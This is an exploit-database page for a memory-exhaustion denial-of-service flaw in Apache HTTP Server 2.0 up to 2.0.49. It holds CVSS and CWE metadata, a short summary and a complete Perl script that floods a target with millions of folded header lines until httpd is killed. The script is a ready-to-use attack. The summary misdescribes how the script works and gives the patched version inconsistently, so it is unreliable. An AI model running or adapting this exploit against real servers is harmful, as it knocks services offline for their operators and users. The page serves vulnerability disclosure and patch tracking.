exploit for apache ap_get_mime_headers_core() vuln

vendor:

Apache HTTP Server

by:

bkbll

7.5

CVSS

HIGH

ap_get_mime_headers_core() vulnerability

400

CWE

Product Name: Apache HTTP Server

Affected Version From: Apache 2.0

Affected Version To: Apache 2.0.49

Patch Exists: YES

Related CWE:

CPE: a:apache:http_server:2.0

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

exploit for apache ap_get_mime_headers_core() vuln

This is an exploit for the Apache ap_get_mime_headers_core() vulnerability. The vulnerability allows an attacker to cause a Denial of Service (D.o.S) attack by sending a specially crafted HTTP request to the target server. The exploit sends a large number of GET requests with a long content-length header, causing the server to run out of memory and potentially crash. This exploit is specific to Apache version 2 prior to version 2.0.49.

Mitigation:

Upgrade to a patched version of Apache (version 2.0.49 or later).

Source

Exploit-DB raw data:

#/usr/bin/perl
#
#exploit for apache ap_get_mime_headers_core() vuln
#
#adv is here: http://www.guninski.com/httpd1.html
#
#version: apache 2 <2.0.49 apache 1 not tested.
#
#by bkbll bkbll#cnhonker.net http://www.cnhonker.com
#
#tail -f /var/log/messages
#Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd)
#

use IO::Socket::INET;

$host="10.10.10.114";
$port=80;
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') || die "new error$@\n";
binmode($sock);
$hostname="Host: $host";
$buf2='A'x50;
$buf4='A'x8183;
$len=length($buf2);
$buf="GET / HTTP/1.1\r\n";
send($sock,$buf,0) || die "send error:$@\n";
for($i= 0; $i < 2000000; $i++)
{
    $buf=" $buf4\r\n";
    send($sock,$buf,0) || die "send error:$@, target maybe have been D.o.S?\n";
}
$buf="$hostname\r\n";
$buf.="Content-Length: $len\r\n";

$buf.="\r\n";
$buf.=$buf2."\r\n\r\n";

send($sock,$buf,0) || die "send error:$@\n";
print "Ok, our buffer have send to target \n";
close($sock);